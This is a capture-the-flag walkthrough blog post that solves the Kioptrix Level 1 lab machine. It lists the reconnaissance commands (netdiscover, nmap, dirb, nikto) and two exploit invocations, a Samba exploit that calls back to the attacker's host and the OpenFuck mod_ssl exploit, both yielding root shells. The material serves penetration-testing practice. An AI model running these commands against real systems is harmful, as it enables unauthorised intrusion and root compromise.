Hello, in this article I will show you step by step how to solve Kioptrix Level 1. The purpose of this CTF will be to become root. Click to get more information about CTF.
LEVEL : Easy
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Reverse Shell via Samba exploit (Solution 1)
- Collecting information via port 80 with Dirb and Nitko tools (Solution 2)
- Reverse Shell via OpenSSL exploit (Solution 2)
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.1.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV -sC -p- --reason 192.168.1.104
SOLUTION - 1
Port 139 was detected as SAMBA smbd and further detailed information could not be obtained with the Nmap tool. In this step, a port scan was performed specifically for port 139 via the MSFConsole tool and a more detailed result was obtained.
Based on the information obtained, research was conducted and an exploit as follows was detected.
When the downloaded exploit is used with the following parameters, a shell that can run commands with root rights is obtained.
./smb -b 0 -c 192.168.1.2 -p 130 192.168.1.104
SOLUTION - 2
Fuzzing was performed via dirb on open port 80. Afterwards, robots.txt was visited among the paths obtained.
dirb http://192.168.1.104/
The paths in robots.txt were visited and no results were obtained. In this step, a tool called nikto was used to collect more information.
nikto --host 192.168.1.104
Using the Nitko tool, information as “mod_ssl 2.8.4” was obtained. When this information was searched on the internet, a Github repo was found as follows.
Expliot was run successfully by following the README.MD content in the relevant Repository and giving the appropriate parameters. After this process, a shell with root rights was received from the target.
./OpenFuck 0x6b 192.168.1.104 443 -c 40
Summary
- I think this article is very useful in that you can use the information obtained from port enumeration to gain authority over the target with just a few operations without being too complicated.
Click here to see my other articles about OSCP Walkthrough. Link